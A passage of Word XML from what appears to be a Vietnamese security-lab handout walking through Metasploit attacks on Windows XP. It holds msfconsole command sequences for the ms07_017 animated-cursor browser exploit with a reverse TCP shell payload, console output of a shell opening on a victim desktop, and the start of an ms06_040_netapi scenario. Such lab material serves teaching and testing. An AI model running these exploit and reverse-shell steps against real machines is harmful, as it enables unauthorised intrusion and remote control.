        <w:t xml:space="preserve"> 192.168.1.110</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0041641A" w:rsidR="008E3F20" w:rsidP="009F5AB1" w:rsidRDefault="3B9C5DF7" w14:paraId="73807DD4" w14:textId="2479A8F2">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>set LHOST 192.168.1.10</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008E3F20" w:rsidP="009F5AB1" w:rsidRDefault="3B9C5DF7" w14:paraId="236815DE" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>set LPORT 4444</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0041641A" w:rsidR="00382063" w:rsidP="00382063" w:rsidRDefault="00382063" w14:paraId="014AA67E" w14:textId="765F0E77">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">set </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>TARGET</w:t>
      </w:r>
      <w:r w:rsidRPr="0041641A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0041641A" w:rsidR="008E3F20" w:rsidP="009F5AB1" w:rsidRDefault="3B9C5DF7" w14:paraId="6B1BB632" w14:textId="01F0518D">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>exploit</w:t>
      </w:r>
      <w:r w:rsidR="00382063">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> -j</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0041641A" w:rsidR="008E3F20" w:rsidP="35DFF694" w:rsidRDefault="3B9C5DF7" w14:paraId="2129801F" w14:textId="506B1D96">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc65834500" w:id="44"/>
      <w:bookmarkStart w:name="_Toc1826872232" w:id="45"/>
      <w:bookmarkStart w:name="_Toc145594635" w:id="46"/>
      <w:r w:rsidRPr="3CE16CD3">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Tấn công Windows XP</w:t>
      </w:r>
      <w:bookmarkEnd w:id="44"/>
      <w:bookmarkEnd w:id="45"/>
      <w:r w:rsidRPr="3CE16CD3" w:rsidR="00FF554E">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="3CE16CD3" w:rsidR="00783792">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>ms07_017_ani_loadimage_chunksize</w:t>
      </w:r>
      <w:bookmarkEnd w:id="46"/>
    </w:p>
    <w:p w:rsidRPr="0041641A" w:rsidR="008E3F20" w:rsidP="35DFF694" w:rsidRDefault="3B9C5DF7" w14:paraId="5024E4BA" w14:textId="4EF2BA58">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">Máy Kali linux có </w:t>
      </w:r>
      <w:r w:rsidRPr="0041641A" w:rsidR="00F16D27">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Địa chỉ IP 192</w:t>
      </w:r>
      <w:r w:rsidRPr="0041641A">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">.168.1.10 (LHOST) sẽ tấn công máy Win XP có </w:t>
      </w:r>
      <w:r w:rsidRPr="0041641A" w:rsidR="00F16D27">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Địa chỉ IP 192</w:t>
      </w:r>
      <w:r w:rsidRPr="0041641A">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>.168.1.110, 192.168.1.111, 192.168.1.112</w:t>
      </w:r>
      <w:r w:rsidRPr="0041641A">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> (RHOST) dựa trên lổ hổng </w:t>
      </w:r>
      <w:r w:rsidRPr="0041641A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>loadimage_chunksize</w:t>
      </w:r>
      <w:r w:rsidRPr="0041641A">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0041641A" w:rsidR="008E3F20" w:rsidP="35DFF694" w:rsidRDefault="3B9C5DF7" w14:paraId="326787A4" w14:textId="77777777">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Passive exploits wait for incoming hosts and exploit them as they connect.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0041641A" w:rsidR="008E3F20" w:rsidP="35DFF694" w:rsidRDefault="3B9C5DF7" w14:paraId="48CB70C6" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Passive exploits almost always focus on clients such as web browsers, FTP clients, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0041641A" w:rsidR="008E3F20" w:rsidP="35DFF694" w:rsidRDefault="3B9C5DF7" w14:paraId="3FB23FBC" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>They can also be used in conjunction with email exploits, waiting for connections.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0041641A" w:rsidR="008E3F20" w:rsidP="35DFF694" w:rsidRDefault="3B9C5DF7" w14:paraId="3443E70A" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Passive exploits report shells as they happen can be enumerated by passing ‘-l’ to the sessions command. Passing ‘-i’ will interact with a shell.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0041641A" w:rsidR="008E3F20" w:rsidP="000634C0" w:rsidRDefault="3B9C5DF7" w14:paraId="2C033902" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc20454843" w:id="47"/>
      <w:bookmarkStart w:name="_Toc20808955" w:id="48"/>
      <w:bookmarkStart w:name="_Toc1867665558" w:id="49"/>
      <w:bookmarkStart w:name="_Toc145594636" w:id="50"/>
      <w:bookmarkEnd w:id="47"/>
      <w:r w:rsidRPr="3CE16CD3">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Thực hành</w:t>
      </w:r>
      <w:bookmarkEnd w:id="48"/>
      <w:bookmarkEnd w:id="49"/>
      <w:bookmarkEnd w:id="50"/>
    </w:p>
    <w:p w:rsidRPr="0041641A" w:rsidR="008E3F20" w:rsidP="35DFF694" w:rsidRDefault="3B9C5DF7" w14:paraId="12AEDB6B" w14:textId="77777777">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>The following output shows the setup to exploit the animated cursor vulnerability. The exploit does not fire until a victim browses to our malicious website.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0041641A" w:rsidR="00B73BDE" w:rsidP="00B73BDE" w:rsidRDefault="00B73BDE" w14:paraId="0AD5C33C" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtNoiDung"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>// Nếu đã chạy msf6 thì không cần chạy lại lệnh sudo msfconsole</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0041641A" w:rsidR="00B73BDE" w:rsidP="00B73BDE" w:rsidRDefault="00B73BDE" w14:paraId="45AF9084" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>user@vmkali:~$ cd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0041641A" w:rsidR="00B73BDE" w:rsidP="00B73BDE" w:rsidRDefault="00B73BDE" w14:paraId="7B47E8DF" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>user@vmkali:~$ sudo msfconsole</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0041641A" w:rsidR="00B73BDE" w:rsidP="446FC441" w:rsidRDefault="00B73BDE" w14:paraId="0E87CD25" w14:textId="77777777">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="0041641A" w:rsidR="00C53EFD" w:rsidP="00C53EFD" w:rsidRDefault="00C53EFD" w14:paraId="15B5ACA4" w14:textId="0A40AA92">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>msf6 &gt; back</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0041641A" w:rsidR="00B8506E" w:rsidP="009F5AB1" w:rsidRDefault="00B8506E" w14:paraId="45D77E10" w14:textId="7485018A">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>msf6 &gt; ping 192.168.1.1</w:t>
      </w:r>
      <w:r w:rsidRPr="0041641A" w:rsidR="00903848">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A2630D" w:rsidP="009F5AB1" w:rsidRDefault="00A2630D" w14:paraId="6C20FBA2" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="0041641A" w:rsidR="008E3F20" w:rsidP="009F5AB1" w:rsidRDefault="3B9C5DF7" w14:paraId="62DB2AF0" w14:textId="5EAB491E">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>use exploit/windows/browser/</w:t>
      </w:r>
      <w:r w:rsidRPr="0041641A" w:rsidR="00783792">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>ms07_017_ani_loadimage_chunksize</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0041641A" w:rsidR="008E3F20" w:rsidP="009F5AB1" w:rsidRDefault="3B9C5DF7" w14:paraId="0D0B2D08" w14:textId="62B8D273">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>set URIPATH /</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0041641A" w:rsidR="008E3F20" w:rsidP="009F5AB1" w:rsidRDefault="3B9C5DF7" w14:paraId="0F3D306F" w14:textId="676E7A4A">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>set PAYLOAD windows/shell/reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0041641A" w:rsidR="008E3F20" w:rsidP="009F5AB1" w:rsidRDefault="3B9C5DF7" w14:paraId="5C5817CE" w14:textId="4B775B24">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>set LHOST 192.168.1.10</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008E3F20" w:rsidP="009F5AB1" w:rsidRDefault="3B9C5DF7" w14:paraId="3A962C8D" w14:textId="2B53698D">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>set LPORT 44</w:t>
      </w:r>
      <w:r w:rsidR="00A2630D">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>77</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0041641A" w:rsidR="00A2630D" w:rsidP="00A2630D" w:rsidRDefault="00A2630D" w14:paraId="2C2261BC" w14:textId="0E5B937B">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>set RHOST</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="0041641A">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> 192.168.1.11</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008E3F20" w:rsidP="009F5AB1" w:rsidRDefault="00A2630D" w14:paraId="34950C68" w14:textId="174102BF">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>run</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0041641A" w:rsidR="00A2630D" w:rsidP="009F5AB1" w:rsidRDefault="00A2630D" w14:paraId="5D7C0271" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="0041641A" w:rsidR="008E3F20" w:rsidP="00A6227C" w:rsidRDefault="3B9C5DF7" w14:paraId="5509C94C" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:t>[*] Exploit running as background job.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0041641A" w:rsidR="008E3F20" w:rsidP="00A6227C" w:rsidRDefault="3B9C5DF7" w14:paraId="737C4871" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0041641A" w:rsidR="008E3F20" w:rsidP="00A6227C" w:rsidRDefault="3B9C5DF7" w14:paraId="01F3FD1B" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:t>[*] Started reverse handler</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0041641A" w:rsidR="008E3F20" w:rsidP="00A6227C" w:rsidRDefault="3B9C5DF7" w14:paraId="0841B793" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:t>[*] Using URL: http://0.0.0.0:8080/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0041641A" w:rsidR="008E3F20" w:rsidP="00A6227C" w:rsidRDefault="3B9C5DF7" w14:paraId="5C2C2FCF" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:t>[*]  Local IP: http://192.168.1.5:8080/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0041641A" w:rsidR="008E3F20" w:rsidP="00A6227C" w:rsidRDefault="3B9C5DF7" w14:paraId="26330BE2" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:t>[*] Server started.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0041641A" w:rsidR="008E3F20" w:rsidP="00A6227C" w:rsidRDefault="00CF4C67" w14:paraId="0F5B92AE" w14:textId="30955570">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:t>msf6 exploit</w:t>
      </w:r>
      <w:r w:rsidRPr="0041641A" w:rsidR="3B9C5DF7">
        <w:t>(ani_loadimage_chunksize) &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0041641A" w:rsidR="008E3F20" w:rsidP="00A6227C" w:rsidRDefault="3B9C5DF7" w14:paraId="4716CBD1" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:t>[*] Attempting to exploit ani_loadimage_chunksize</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0041641A" w:rsidR="008E3F20" w:rsidP="00A6227C" w:rsidRDefault="3B9C5DF7" w14:paraId="5095EA04" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:t>[*] Sending HTML page to 192.168.1.10:1077...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0041641A" w:rsidR="008E3F20" w:rsidP="00A6227C" w:rsidRDefault="3B9C5DF7" w14:paraId="223F742C" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:t>[*] Attempting to exploit ani_loadimage_chunksize</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0041641A" w:rsidR="008E3F20" w:rsidP="00A6227C" w:rsidRDefault="3B9C5DF7" w14:paraId="775871DB" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:t>[*] Sending Windows ANI LoadAniIcon() Chunk Size Stack Overflow (HTTP) to 192.168.1.10:1077...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0041641A" w:rsidR="008E3F20" w:rsidP="00A6227C" w:rsidRDefault="3B9C5DF7" w14:paraId="1714CF67" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:t>[*] Sending stage (240 bytes)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0041641A" w:rsidR="008E3F20" w:rsidP="00A6227C" w:rsidRDefault="3B9C5DF7" w14:paraId="14656B2D" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:t>[*] Command shell session 2 opened (192.168.1.5:4444 -&gt; 192.168.1.10:1078)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0041641A" w:rsidR="008E3F20" w:rsidP="00A6227C" w:rsidRDefault="3B9C5DF7" w14:paraId="11CD5F23" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0041641A" w:rsidR="008E3F20" w:rsidP="00A6227C" w:rsidRDefault="00CF4C67" w14:paraId="0EC787A0" w14:textId="2B11424B">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:t>msf6 exploit</w:t>
      </w:r>
      <w:r w:rsidRPr="0041641A" w:rsidR="3B9C5DF7">
        <w:t>(ani_loadimage_chunksize) &gt; sessions -i 2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0041641A" w:rsidR="008E3F20" w:rsidP="00A6227C" w:rsidRDefault="3B9C5DF7" w14:paraId="17AACAA9" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:t>[*] Starting interaction with 2...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0041641A" w:rsidR="008E3F20" w:rsidP="00A6227C" w:rsidRDefault="3B9C5DF7" w14:paraId="0E2D7E74" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0041641A" w:rsidR="008E3F20" w:rsidP="00A6227C" w:rsidRDefault="3B9C5DF7" w14:paraId="0258DF71" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:t>Microsoft Windows XP [Version 5.1.2600]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0041641A" w:rsidR="008E3F20" w:rsidP="00A6227C" w:rsidRDefault="3B9C5DF7" w14:paraId="2680A77A" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:t>(C) Copyright 1985-2001 Microsoft Corp.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0041641A" w:rsidR="008E3F20" w:rsidP="00A6227C" w:rsidRDefault="3B9C5DF7" w14:paraId="30A5BA5B" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0041641A" w:rsidR="008E3F20" w:rsidP="00A6227C" w:rsidRDefault="3B9C5DF7" w14:paraId="60EB0707" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:t>C:\Documents and Settings\victim\Desktop&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0041641A" w:rsidR="008E3F20" w:rsidP="00A6227C" w:rsidRDefault="3B9C5DF7" w14:paraId="33798CCF" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidR="3B9C5DF7">
        <w:rPr/>
        <w:t>Next, we will look at how to actually use exploits in Metasploit.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00C0074E" w:rsidR="008E3F20" w:rsidP="00CA4DC8" w:rsidRDefault="1F43E25B" w14:paraId="74305F0E" w14:textId="19080B8B">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc20808983" w:id="53"/>
      <w:bookmarkStart w:name="_Toc65834514" w:id="54"/>
      <w:bookmarkStart w:name="_Toc1863458357" w:id="55"/>
      <w:bookmarkStart w:name="_Toc145594638" w:id="56"/>
      <w:r w:rsidRPr="3CE16CD3">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Tham khảo thêm một số kịch bản tấn công trên WinXP</w:t>
      </w:r>
      <w:bookmarkEnd w:id="53"/>
      <w:bookmarkEnd w:id="54"/>
      <w:bookmarkEnd w:id="55"/>
      <w:bookmarkEnd w:id="56"/>
    </w:p>
    <w:p w:rsidRPr="00C0074E" w:rsidR="00CB201B" w:rsidP="00CB201B" w:rsidRDefault="00CB201B" w14:paraId="1832ADB6" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>use exploit/windows/smb/ms06_040_netapi</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00C0074E" w:rsidR="00903848" w:rsidP="00903848" w:rsidRDefault="00903848" w14:paraId="40E2E06B" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C0074E">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>user@vmkali:~$ cd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00C0074E" w:rsidR="00903848" w:rsidP="00903848" w:rsidRDefault="00903848" w14:paraId="5AC8463B" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C0074E">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>user@vmkali:~$ sudo msfconsole</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00C0074E" w:rsidR="00903848" w:rsidP="00903848" w:rsidRDefault="00903848" w14:paraId="503B2BB6" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
